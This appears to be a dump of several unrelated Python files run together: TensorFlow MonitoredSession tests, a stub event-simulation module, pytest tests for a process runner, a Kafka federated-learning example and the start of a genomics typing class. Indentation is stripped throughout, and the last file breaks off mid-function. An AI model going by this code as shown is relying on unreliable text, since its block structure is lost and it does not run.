self.assertEqual(hook.call_counter['begin'], 0)
self.assertEqual(hook.call_counter['after_create_session'], 0)
self.assertEqual(hook.call_counter['before_run'], 1)
self.assertEqual(hook.call_counter['after_run'], 1)
def testShouldStop(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
constant_op.constant([0], name='a_tensor')
sess.run(variables.global_variables_initializer())
mon_sess.run(fetches='a_tensor')
self.assertFalse(mon_sess.should_stop())
mock_hook.should_stop = True
mon_sess.run(fetches='a_tensor')
self.assertTrue(mon_sess.should_stop())
def testFetchesHookRequests(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = constant_op.constant([0], name='a_tensor')
another_tensor = constant_op.constant([5], name='another_tensor')
third_tensor = constant_op.constant([10], name='third_tensor')
mock_hook.request = session_run_hook.SessionRunArgs([another_tensor])
mock_hook2.request = session_run_hook.SessionRunArgs([third_tensor])
sess.run(variables.global_variables_initializer())
output = mon_sess.run(fetches=a_tensor)
self.assertEqual(output, [0])
self.assertEqual(mock_hook.last_run_values.results, [5])
self.assertEqual(mock_hook2.last_run_values.results, [10])
def testOnlyHooksHaveFeeds(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = constant_op.constant([0], name='a_tensor')
b_tensor = constant_op.constant([0], name='b_tensor')
add_tensor = a_tensor + b_tensor
mock_hook.request = session_run_hook.SessionRunArgs(
None, feed_dict={a_tensor: [5]})
mock_hook2.request = session_run_hook.SessionRunArgs(
None, feed_dict={b_tensor: [10]})
sess.run(variables.global_variables_initializer())
self.assertEqual(mon_sess.run(fetches=add_tensor), [15])
def testBothHooksAndUserHaveFeeds(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = constant_op.constant([0], name='a_tensor')
b_tensor = constant_op.constant([0], name='b_tensor')
c_tensor = constant_op.constant([0], name='c_tensor')
add_tensor = a_tensor + b_tensor + c_tensor
mock_hook.request = session_run_hook.SessionRunArgs(
None, feed_dict={a_tensor: [5]})
mock_hook2.request = session_run_hook.SessionRunArgs(
None, feed_dict={b_tensor: [10]})
sess.run(variables.global_variables_initializer())
feed_dict = {c_tensor: [20]}
self.assertEqual(
mon_sess.run(fetches=add_tensor, feed_dict=feed_dict), [35])
# User feed_dict should not be changed
self.assertEqual(len(feed_dict), 1)
def testHooksFeedConflicts(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = constant_op.constant([0], name='a_tensor')
b_tensor = constant_op.constant([0], name='b_tensor')
add_tensor = a_tensor + b_tensor
mock_hook.request = session_run_hook.SessionRunArgs(
None, feed_dict={a_tensor: [5]})
mock_hook2.request = session_run_hook.SessionRunArgs(
None, feed_dict={a_tensor: [10]})
sess.run(variables.global_variables_initializer())
with self.assertRaisesRegexp(RuntimeError, 'Same tensor is fed'):
mon_sess.run(fetches=add_tensor)
def testHooksAndUserFeedConflicts(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = constant_op.constant([0], name='a_tensor')
b_tensor = constant_op.constant([0], name='b_tensor')
add_tensor = a_tensor + b_tensor
mock_hook.request = session_run_hook.SessionRunArgs(
None, feed_dict={a_tensor: [5]})
mock_hook2.request = session_run_hook.SessionRunArgs(
None, feed_dict={b_tensor: [10]})
sess.run(variables.global_variables_initializer())
with self.assertRaisesRegexp(RuntimeError, 'Same tensor is fed'):
mon_sess.run(fetches=add_tensor, feed_dict={b_tensor: [10]})
class RaiseOnceAtCountN(session_run_hook.SessionRunHook):
"""Hook that raises an Exception at step N."""
def __init__(self, n, ex):
self.n = n
self.ex = ex
self.raised = False
def before_run(self, run_context):
# Raise the first time we reach step N.
self.n -= 1
if 0 == self.n and not self.raised:
self.raised = True
raise self.ex
return None
class RunOptionsMetadataHook(session_run_hook.SessionRunHook):
"""A hook that observes & optionally modifies RunOptions and RunMetadata."""
def __init__(self, trace_level, timeout_in_ms, output_partition_graphs,
debug_tensor_watch):
self._trace_level = trace_level
self._timeout_in_ms = timeout_in_ms
self._output_partition_graphs = output_partition_graphs
self._debug_tensor_watch = debug_tensor_watch
self.run_options_list = []
self.run_metadata_list = []
def before_run(self, run_context):
options = config_pb2.RunOptions(
trace_level=self._trace_level,
timeout_in_ms=self._timeout_in_ms,
output_partition_graphs=self._output_partition_graphs)
options.debug_options.debug_tensor_watch_opts.extend(
[self._debug_tensor_watch])
return session_run_hook.SessionRunArgs(None, None, options=options)
def after_run(self, run_context, run_values):
self.run_options_list.append(run_values.options)
self.run_metadata_list.append(run_values.run_metadata)
class MonitoredSessionTest(test.TestCase):
"""MonitoredSession tests."""
def test_defaults(self):
with ops.Graph().as_default():
a_var = variables.Variable(0)
with monitored_session.MonitoredSession() as session:
self.assertEqual(0, session.run(a_var))
def test_last_step(self):
logdir = _test_dir(self.get_temp_dir(), 'test_last_step')
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
# Run till step 3 and save.
hooks = [basic_session_run_hooks.StopAtStepHook(last_step=3)]
scaffold = monitored_session.Scaffold().finalize()
with monitored_session.MonitoredSession(hooks=hooks) as session:
self.assertEqual(0, session.run(gstep))
self.assertFalse(session.should_stop())
self.assertEqual(1, session.run(do_step))
self.assertFalse(session.should_stop())
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
self.assertEqual(3, session.run(do_step))
self.assertTrue(session.should_stop())
save_path = scaffold.saver.save(session._coordinated_creator.tf_sess,
os.path.join(logdir, 'step-3'))
# Run till step 5 and save.
def load_ckpt(scaffold, sess):
scaffold.saver.restore(sess, save_path)
session_creator = monitored_session.ChiefSessionCreator(
monitored_session.Scaffold(init_fn=load_ckpt))
hooks = [basic_session_run_hooks.StopAtStepHook(last_step=5)]
with monitored_session.MonitoredSession(
hooks=hooks, session_creator=session_creator) as session:
self.assertEqual(3, session.run(gstep))
self.assertFalse(session.should_stop())
self.assertEqual(4, session.run(do_step))
self.assertFalse(session.should_stop())
self.assertEqual(5, session.run(do_step))
self.assertTrue(session.should_stop())
def test_num_steps(self):
logdir = _test_dir(self.get_temp_dir(), 'test_num_steps')
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
# Do 3 steps and save.
hooks = [basic_session_run_hooks.StopAtStepHook(num_steps=3)]
scaffold = monitored_session.Scaffold().finalize()
with monitored_session.MonitoredSession(hooks=hooks) as session:
session.run(do_step)
self.assertFalse(session.should_stop())
session.run(do_step)
self.assertFalse(session.should_stop())
session.run(do_step)
self.assertTrue(session.should_stop())
save_path = scaffold.saver.save(session._coordinated_creator.tf_sess,
os.path.join(logdir, 'step-3'))
# Restore and do 4 steps.
def load_ckpt(scaffold, sess):
scaffold.saver.restore(sess, save_path)
session_creator = monitored_session.ChiefSessionCreator(
scaffold=monitored_session.Scaffold(init_fn=load_ckpt))
hooks = [basic_session_run_hooks.StopAtStepHook(num_steps=4)]
with monitored_session.MonitoredSession(
hooks=hooks, session_creator=session_creator) as session:
self.assertEqual(4, session.run(do_step))
self.assertFalse(session.should_stop())
session.run(do_step)
self.assertFalse(session.should_stop())
session.run(do_step)
self.assertFalse(session.should_stop())
session.run(do_step)
self.assertTrue(session.should_stop())
# This set of tests, verifies the supervised session behavior when exceptions
# are raised next to the innermost session run() call.
def test_recovery(self):
logdir = _test_dir(self.get_temp_dir(), 'test_recovery')
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
scaffold = monitored_session.Scaffold()
# Use a hook to save the model every 100 steps. It also saves it at
# the end.
hooks = [
basic_session_run_hooks.CheckpointSaverHook(
logdir, save_steps=1, scaffold=scaffold)
]
with monitored_session.MonitoredSession(
session_creator=monitored_session.ChiefSessionCreator(
scaffold, checkpoint_dir=logdir),
hooks=hooks) as session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
# A restart will find the checkpoint and recover automatically.
with monitored_session.MonitoredSession(
session_creator=monitored_session.ChiefSessionCreator(
scaffold, checkpoint_dir=logdir)) as session:
self.assertEqual(2, session.run(gstep))
# A restart will find the checkpoint and recover automatically.
with monitored_session.MonitoredSession(
session_creator=monitored_session.ChiefSessionCreator(
scaffold,
checkpoint_filename_with_path=saver_lib.latest_checkpoint(
logdir))) as session:
self.assertEqual(2, session.run(gstep))
def test_retry_initialization_on_aborted_error(self):
# Tests that we silently retry on abort during initialization.
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
self.init_raised_aborted_error = False
def _init_fn(scaffold, session):
_, _ = scaffold, session
if not self.init_raised_aborted_error:
self.init_raised_aborted_error = True
raise errors_impl.AbortedError(None, None, 'Abort')
with monitored_session.MonitoredSession(
session_creator=monitored_session.ChiefSessionCreator(
scaffold=monitored_session.Scaffold(
init_fn=_init_fn))) as session:
self.assertFalse(session.should_stop())
self.assertEqual(0, session.run(gstep))
self.assertTrue(self.init_raised_aborted_error)
def _retry_test(self, ex):
# Tests that we silently retry on error. Note that this does not test
# recovery as we do not use a CheckpointSaver in this test.
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
hook = RaiseOnceAtCountN(4, ex)
with monitored_session.MonitoredSession(hooks=[hook]) as session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# Here at step 3, the hook triggers and raises AbortedError. The
# MonitoredSession automatically retries and restart from a freshly
# initialized session, so the step is back to 0 and running do_step
# moves it to 1.
self.assertEqual(1, session.run(do_step))
self.assertFalse(session.should_stop())
self.assertTrue(hook.raised)
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
def test_retry_on_aborted_error(self):
self._retry_test(errors_impl.AbortedError(None, None, 'Abort'))
def test_retry_on_unavailable_error(self):
self._retry_test(errors_impl.UnavailableError(None, None, 'Unavailable'))
def test_recover_and_retry_on_aborted_error(self):
# Tests that we silently retry and recover on abort. This test uses
# a CheckpointSaver to have something to recover from.
logdir = _test_dir(self.get_temp_dir(),
'test_recover_and_retry_on_aborted_error')
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
scaffold = monitored_session.Scaffold()
abort_hook = RaiseOnceAtCountN(
4, errors_impl.AbortedError(None, None, 'Abort'))
# Save after each step.
ckpt_hook = basic_session_run_hooks.CheckpointSaverHook(
logdir, save_steps=1, scaffold=scaffold)
hooks = [abort_hook, ckpt_hook]
with monitored_session.MonitoredSession(
session_creator=monitored_session.ChiefSessionCreator(
scaffold, checkpoint_dir=logdir),
hooks=hooks) as session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# Here at step 3, the hook triggers and raises AbortedError. The
# MonitoredSession automatically restores and retries.
self.assertEqual(3, session.run(do_step))
self.assertTrue(abort_hook.raised)
self.assertFalse(session.should_stop())
self.assertEqual(4, session.run(do_step))
self.assertFalse(session.should_stop())
def test_exit_cleanly_on_out_of_range_exception(self):
# Tests that we stop cleanly when OutOfRange is raised.
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
hook = RaiseOnceAtCountN(2, errors_impl.OutOfRangeError(None, None,
'EOI'))
session = monitored_session.MonitoredSession(hooks=[hook])
# session should cleanly exit from the context.
with session:
self.assertEqual(0, session.run(gstep))
self.assertFalse(session.should_stop())
# Here at step 1, the hook triggers and raises OutOfRange. The
# session should go into should_stop() mode. It should raise the
# exception. So next step should not be executed.
session.run(do_step)
self.assertTrue(False)
self.assertTrue(session.should_stop())
def test_exit_cleanly_on_stop_iteration_exception(self):
# Tests that we stop cleanly when OutOfRange is raised.
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
hook = RaiseOnceAtCountN(2, StopIteration)
session = monitored_session.MonitoredSession(hooks=[hook])
# session should cleanly exit from the context.
with session:
self.assertEqual(0, session.run(gstep))
self.assertFalse(session.should_stop())
# Here at step 1, the hook triggers and raises StopIteration. The
# session should go into should_stop() mode. It should raise the
# exception. So next step should not be executed.
session.run(do_step)
self.assertTrue(False)
self.assertTrue(session.should_stop())
def test_regular_exception_pass_through_run(self):
# Tests that regular exceptions just pass through a "with
# MonitoredSession" block and set the session in stop mode.
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
hook = RaiseOnceAtCountN(4, RuntimeError('regular exception'))
session = monitored_session.MonitoredSession(hooks=[hook])
with self.assertRaisesRegexp(RuntimeError, 'regular exception'):
with session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# This triggers the hook and raises the exception
session.run(do_step)
# We should not hit this
self.assertFalse(True)
self.assertTrue(hook.raised)
self.assertTrue(session.should_stop())
def test_regular_exception_reported_to_coord_pass_through_run(self):
# Tests that regular exceptions reported to the coordinator from a thread
# passes through a "run()" call within a "with MonitoredSession" block and
# set the session in stop mode.
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
session = monitored_session.MonitoredSession()
run_performed_without_error = False
with self.assertRaisesRegexp(RuntimeError, 'a thread wants to stop'):
with session:
self.assertEqual(0, session.run(gstep))
# Report an exception through the coordinator.
try:
raise RuntimeError('a thread wants to stop')
except RuntimeError as e:
session._coordinated_creator.coord.request_stop(e)
# Call run() which should perform normally.
self.assertEqual(0, session.run(gstep))
run_performed_without_error = True
self.assertTrue(run_performed_without_error)
def test_regular_exception_reported_to_coord_pass_through_return(self):
# Tests that regular exceptions reported to the coordinator from a thread
# passes through returning from a "with MonitoredSession" block and
# set the session in stop mode.
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
session = monitored_session.MonitoredSession()
with self.assertRaisesRegexp(RuntimeError, 'a thread wants to stop'):
with session:
self.assertEqual(0, session.run(gstep))
# Report an exception through the coordinator.
try:
raise RuntimeError('a thread wants to stop')
except RuntimeError as e:
session._coordinated_creator.coord.request_stop(e)
self.assertTrue(session.should_stop())
# This set of tests, verifies the session behavior when exceptions are raised
# from code inside a "with MonitoredSession:" context.
def test_stop_cleanly_when_no_exception_in_with_body(self):
# Tests that regular exceptions pass through
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
session = monitored_session.MonitoredSession()
with session:
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# Should have closed.
self.assertTrue(session.should_stop())
self.assertTrue(session._is_closed())
def test_raises_regular_exceptions_in_with_body(self):
# Tests that regular exceptions in "with body" are seen outside.
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
session = monitored_session.MonitoredSession()
# We should see that exception.
with self.assertRaisesRegexp(RuntimeError, 'regular exception'):
with session:
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# Will be visible outside the "with body".
raise RuntimeError('regular exception')
# Should have closed.
self.assertTrue(session.should_stop())
self.assertTrue(session._is_closed())
def test_graph(self):
with ops.Graph().as_default() as g:
with monitored_session.MonitoredSession() as session:
self.assertEqual(g, session.graph)
def test_graph_finalized_during_run_unfinalized_after_exit(self):
with ops.Graph().as_default() as g:
a_var = variables.Variable(0)
with monitored_session.MonitoredSession() as session:
self.assertEqual(0, session.run(a_var))
self.assertTrue(g.finalized)
self.assertFalse(g.finalized)
def test_keep_finalized_graph_as_finalized(self):
with ops.Graph().as_default() as g:
a_var = variables.Variable(0)
monitored_session.Scaffold().finalize()
with monitored_session.MonitoredSession() as session:
self.assertEqual(0, session.run(a_var))
self.assertTrue(g.finalized)
self.assertTrue(g.finalized)
def test_merge_run_options_from_hooks(self):
"""Test for rewriting RunOptions and observing RunMetadata with hooks."""
with ops.Graph().as_default():
my_const = constant_op.constant(42, name='my_const')
_ = constant_op.constant(24, name='my_const_2')
watch_a = debug_pb2.DebugTensorWatch(
node_name='my_const',
output_slot=0,
debug_ops=['DebugIdentity'],
debug_urls=[])
hook_a = RunOptionsMetadataHook(2, 30000, False, watch_a)
watch_b = debug_pb2.DebugTensorWatch(
node_name='my_const_2',
output_slot=0,
debug_ops=['DebugIdentity'],
debug_urls=[])
hook_b = RunOptionsMetadataHook(3, 60000, True, watch_b)
with monitored_session.MonitoredSession(
hooks=[hook_a, hook_b]) as session:
self.assertEqual(42, session.run(my_const))
# trace_level=3 should have overridden trace_level=2;
# timeout_in_ms=60000 should have overridden 30000;
# output_partition_graphs=True should have overridden False.
# The two debug tensor watches should have been merged.
self.assertEqual(
[
config_pb2.RunOptions(
trace_level=3,
timeout_in_ms=60000,
output_partition_graphs=True,
debug_options=debug_pb2.DebugOptions(
debug_tensor_watch_opts=[watch_a, watch_b]))
],
hook_b.run_options_list)
self.assertEqual(1, len(hook_b.run_metadata_list))
self.assertTrue(
isinstance(hook_b.run_metadata_list[0], config_pb2.RunMetadata))
self.assertGreater(len(hook_b.run_metadata_list[0].partition_graphs), 0)
def test_merge_caller_and_hook_run_options(self):
"""Test that RunOptions from caller and hooks can be merged properly."""
with ops.Graph().as_default():
my_const = constant_op.constant(42, name='my_const')
_ = constant_op.constant(24, name='my_const_2')
hook_watch = debug_pb2.DebugTensorWatch(
node_name='my_const_2',
output_slot=0,
debug_ops=['DebugIdentity'],
debug_urls=[])
hook = RunOptionsMetadataHook(2, 60000, False, hook_watch)
with monitored_session.MonitoredSession(hooks=[hook]) as session:
caller_watch = debug_pb2.DebugTensorWatch(
node_name='my_const',
output_slot=0,
debug_ops=['DebugIdentity'],
debug_urls=[])
caller_options = config_pb2.RunOptions(
trace_level=3, timeout_in_ms=30000, output_partition_graphs=True)
caller_options.debug_options.debug_tensor_watch_opts.extend(
[caller_watch])
self.assertEqual(42, session.run(my_const, options=caller_options))
# trace_level=3 from the caller should override 2 from the hook.
# timeout_in_ms=60000 from the hook should override from the caller.
# output_partition_graph=True from the caller should override False
# from the hook.
# The two debug watches from the caller and the hook should be merged,
# in that order.
self.assertEqual(
[
config_pb2.RunOptions(
trace_level=3,
timeout_in_ms=60000,
output_partition_graphs=True,
debug_options=debug_pb2.DebugOptions(
debug_tensor_watch_opts=[caller_watch, hook_watch]))
],
hook.run_options_list)
self.assertEqual(1, len(hook.run_metadata_list))
self.assertTrue(
isinstance(hook.run_metadata_list[0], config_pb2.RunMetadata))
self.assertGreater(len(hook.run_metadata_list[0].partition_graphs), 0)
class SingularMonitoredSessionTest(test.TestCase):
"""Tests SingularMonitoredSession."""
def test_handles_initialization(self):
with ops.Graph().as_default():
a_var = variables.Variable(0)
with monitored_session.SingularMonitoredSession() as session:
# If it's not initialized, following statement raises an error.
self.assertEqual(0, session.run(a_var))
def test_do_not_handle_aborted_error(self):
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
class _RaiseAbortedHook(session_run_hook.SessionRunHook):
def before_run(self, run_context):
raise errors_impl.AbortedError(None, None, 'Abort')
with monitored_session.SingularMonitoredSession(
hooks=[_RaiseAbortedHook()]) as session:
with self.assertRaises(errors_impl.AbortedError):
self.assertEqual(0, session.run(gstep))
with self.assertRaises(errors_impl.AbortedError):
with monitored_session.SingularMonitoredSession(
hooks=[_RaiseAbortedHook()]) as session:
self.assertEqual(0, session.run(gstep))
def test_exit_cleanly_on_out_of_range_exception(self):
# Tests that we stop cleanly when OutOfRange is raised.
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
hook = RaiseOnceAtCountN(2, errors_impl.OutOfRangeError(None, None,
'EOI'))
session = monitored_session.SingularMonitoredSession(hooks=[hook])
# session should cleanly exit from the context.
with session:
self.assertEqual(0, session.run(gstep))
self.assertFalse(session.should_stop())
# Here at step 1, the hook triggers and raises OutOfRange. The
# session should go into should_stop() mode. It should raise the
# exception. So next step should not be executed.
session.run(do_step)
self.assertTrue(False)
self.assertTrue(session.should_stop())
def test_regular_exception_reported_to_coord_pass_through_run(self):
# Tests that regular exceptions reported to the coordinator from a thread
# passes through a "run()" call within a "with MonitoredSession" block and
# set the session in stop mode.
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
session = monitored_session.SingularMonitoredSession()
run_performed_without_error = False
with self.assertRaisesRegexp(RuntimeError, 'a thread wants to stop'):
with session:
self.assertEqual(0, session.run(gstep))
# Report an exception through the coordinator.
try:
raise RuntimeError('a thread wants to stop')
except RuntimeError as e:
session._coordinated_creator.coord.request_stop(e)
# Call run() which should perform normally.
self.assertEqual(0, session.run(gstep))
run_performed_without_error = True
self.assertTrue(run_performed_without_error)
def test_stop_cleanly_when_no_exception_in_with_body(self):
# Tests that regular exceptions pass through
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
session = monitored_session.SingularMonitoredSession()
with session:
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# Should have closed.
self.assertTrue(session.should_stop())
self.assertEqual(None, session.raw_session())
def test_graph(self):
with ops.Graph().as_default() as g:
with monitored_session.SingularMonitoredSession() as session:
self.assertEqual(g, session.graph)
def test_raw_session(self):
with ops.Graph().as_default():
with monitored_session.SingularMonitoredSession() as session:
self.assertTrue(isinstance(session.raw_session(), session_lib.Session))
if __name__ == '__main__':
test.main()
|
__main__.py | import os
from enum import Enum, auto
from typing import List, Tuple, Callable, Dict
import multiprocessing
Address = List[str]
Time = int
TimeInterval = int
class Message:
def __init__(self):
pass
@property
def target(self) -> Address:
return None
def retarget(self, new_target: Address) -> None:
pass
@property
def source(self) -> Address:
return None
@property
def emission_time(self) -> Time:
return None
@property
def wire_time(self) -> TimeInterval:
return None
class PinState(Enum):
CLOSED = auto()
OPEN = auto()
WAITING = auto()
class Pin:
def __init__(self):
pass
@property
def name(self) -> str:
return None
@property
def state(self) -> PinState:
return None
@property
def process(self, msg: Message) -> Time:
return 0
class Actor:
def __init__(self):
pass
@property
def name(self) -> str:
return None
@property
def pins(self) -> List[Pin]:
return []
class Impulse:
def generate(self) -> List[Message]:
return []
class MsgRouter:
def route(self, msg: Message) -> None:
pass
class Engine:
def step(self, router: MsgRouter) -> TimeInterval:
return 0
def put(self, msg: Message) -> None:
pass
class DiscreteEventEngine(Engine):
def step(self, router: MsgRouter) -> TimeInterval:
return 0
def put(self, msg: Message) -> None:
pass
class ImpulseEngine(Engine):
def step(self, router: MsgRouter) -> TimeInterval:
return 0
def put(self, msg: Message) -> None:
pass
class ParallelContext(MsgRouter):
def __init__(self):
self._engines = []
self._name_engine_dict = {}
self._wave_t1 = None
self._wave_times = []
self._parall_msg_queue = multiprocessing.Queue()
def route(self, msg: Message) -> None:
self._parall_msg_queue.put(msg)
@property
def engine_count(self) -> int:
return len(self._engines)
@staticmethod
def _run_parall(funcs_kwargs: List[Tuple[Callable, Dict]]) -> None:
processes = []
for func, kwargs in funcs_kwargs:
p = multiprocessing.Process(target=func, kwargs=kwargs)
processes.append(p)
p.start()
for p in processes:
p.join()
def _step_parall(self, engines: List[Engine]) -> List[TimeInterval]:
def step_engine(engines, out_intervals, index):
out_intervals[index] = engines[index].step(self)
intervals = [None]*len(engines)
self._run_parall([(lambda i: step_engine(engines, intervals, i), {})
for i in range(len(engines))])
self._process_parall_msg_queue()
return intervals
def _process_parall_msg_queue(self) -> None:
queue = self._parall_msg_queue
while not queue.empty():
msg = queue.get()
path_split = msg.target.split(os.path.sep)
engine_name = path_split[0]
path_remaining = os.path.sep.join(path_split[1:])
msg.retarget(path_remaining)
self._name_engine_dict[engine_name].put(msg)
def step(self) -> Tuple[TimeInterval, TimeInterval]:
cand_engines = [self._engines[i] for i in range(self.engine_count)
if (self._wave_t1 is None or
self._wave_times[i] < self._wave_t1)]
if len(cand_engines) == 0:
wave_t1 = max(self._wave_times)
if wave_t1 > self._wave_t1:
return self.step()
else:
return 0
intervals = self._step_parall(cand_engines)
return [min(intervals), max(intervals)]
print("hello") |
test_process.py | """
Tests :mod:`process` module
"""
from multiprocessing import Pipe
from threading import Thread
from time import sleep
import pytest
from taro import ExecutionState, ExecutionError
from taro.jobs.process import ProcessExecution
def test_exec():
parent, child = Pipe()
e = ProcessExecution(exec_hello, (child,))
term_state = e.execute()
assert parent.recv() == ['hello']
assert term_state == ExecutionState.COMPLETED
def exec_hello(pipe):
pipe.send(['hello'])
pipe.close()
def test_failure_error():
e = ProcessExecution(exec_failure_error, ())
with pytest.raises(ExecutionError):
e.execute()
def exec_failure_error():
raise AssertionError
def test_failure_exit():
e = ProcessExecution(exec_failure_exit, ())
with pytest.raises(ExecutionError):
e.execute()
def exec_failure_exit():
exit(1)
@pytest.mark.skip(reason="Hangs tests executed for all project")
def test_stop():
e = ProcessExecution(exec_never_ending_story, ())
t = Thread(target=stop_after, args=(0.5, e))
t.start()
term_state = e.execute()
assert term_state == ExecutionState.STOPPED
def exec_never_ending_story():
while True:
sleep(0.1)
def stop_after(sec, execution):
sleep(sec)
execution.stop()
@pytest.mark.skip(reason="Hangs tests executed for all project")
def test_interrupt():
e = ProcessExecution(exec_never_ending_story, ())
t = Thread(target=interrupt_after, args=(0.5, e))
t.start()
with pytest.raises(ExecutionError):
e.execute()
def interrupt_after(sec, execution):
sleep(sec)
execution.interrupt()
|
example_03_kafkaprocessed.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import multiprocessing
import time
import numpy as np
from sklearn.datasets import load_iris
from sklearn.utils import resample
from src.admin import Admin
from src.client import Client
from src.server import Server
from src.model import FederatedSGDClassifier
from src.utils import get_logger
LOGGER = get_logger('Example kafka process')
SERVER = 'Atlas:9092'
def run_client(idx, dst):
"""Instantiate and run a Client."""
client = Client(
dataset=dst,
groupid=f'client.{idx:03d}',
model=FederatedSGDClassifier(n_classes=3, n_features=4),
server=SERVER
)
client.run()
def run_server(n_clients, loops):
"""Instantiate and run a Server."""
server = Server(
n_clients=n_clients,
groupid='server.001',
model=FederatedSGDClassifier(n_classes=3, n_features=4),
server=SERVER,
max_iter=loops,
)
server.initialize()
server.run()
LOGGER.info(server.current_metrics)
def run_example(n_clients, loops):
"""Run a Kafka-backed federated learning example.
Use multiprocessing to isolate the server and clients'
instantiation and running, so as to emulate behaviour
of distinct participants to the training.
n_clients : number of clients to spawn
loops : maximum number of iterations to train for
"""
# Set up the Kafka backend topics.
admin = Admin(server=SERVER)
admin.setup_server()
# Load the iris dataset and randomly cut it into bootstrapped subsplits.
X, y = load_iris(return_X_y=True)
X, y = resample(X, y, n_samples=n_clients * 100)
datasets = list(zip(np.split(X, n_clients), np.split(y, n_clients)))
# Instantiate processes wrapping the server and clients' code.
processes = [
multiprocessing.Process(target=run_server, args=(n_clients, loops))
]
processes.extend([
multiprocessing.Process(target=run_client, args=(idx, dst))
for idx, dst in enumerate(datasets)
])
# Run the processes parallelly and wait for them to resolve.
for proc in processes:
proc.start()
for proc in processes:
proc.join()
if __name__ =='__main__':
LOGGER.info('Running multiprocessed loop (10 steps) example')
run_example(n_clients=10, loops=10)
|
coretyper.py | #!/usr/bin/env python3
from olctools.accessoryFunctions.accessoryFunctions import dotter, GenObject, make_dict, MetadataObject, make_path, \
printtime, run_subprocess, write_to_logfile
import olctools.accessoryFunctions.metadataprinter as metadataprinter
from genemethods.assemblypipeline import createobject
from Bio import SeqIO
from collections import defaultdict
from threading import Lock, Thread
from csv import DictReader
from queue import Queue
from glob import glob
import operator
import os
__author__ = 'adamkoziol'
class CoreTyper(object):
def handler(self):
"""Run the required analyses"""
printtime('Creating and populating objects', self.start)
self.populate()
printtime('Populating {} sequence profiles'.format(self.analysistype), self.start)
self.profiler()
# Annotate sequences with prokka
self.annotatethreads()
# Run the analyses
self.cdsthreads()
# Find core coding features
self.cdssequencethreads()
# Extract the sequence for each coding feature
self.allelematchthreads()
# Determine sequence types from the analyses
printtime('Determining {} sequence types'.format(self.analysistype), self.start)
self.sequencetyper()
# Create reports
printtime('Creating {} reports'.format(self.analysistype), self.start)
self.reporter()
def populate(self):
# Move the files to subfolders and create objects
if not self.pipeline:
self.metadata = createobject.ObjectCreation(self)
# Create and populate the .core attribute
for sample in self.metadata.samples:
setattr(sample, self.analysistype, GenObject())
sample[self.analysistype].alleles = self.genes
sample[self.analysistype].allelenames = [os.path.split(x)[1].split('.')[0] for x in self.genes]
sample[self.analysistype].profile = self.profile
sample[self.analysistype].alleledir = self.coregenelocation
sample[self.analysistype].reportdir = os.path.join(sample.general.outputdirectory, self.analysistype)
def profiler(self):
"""
Creates a dictionary from the profile scheme(s)
"""
# Initialise variables
profiledata = defaultdict(make_dict)
profileset = set()
genedict = {}
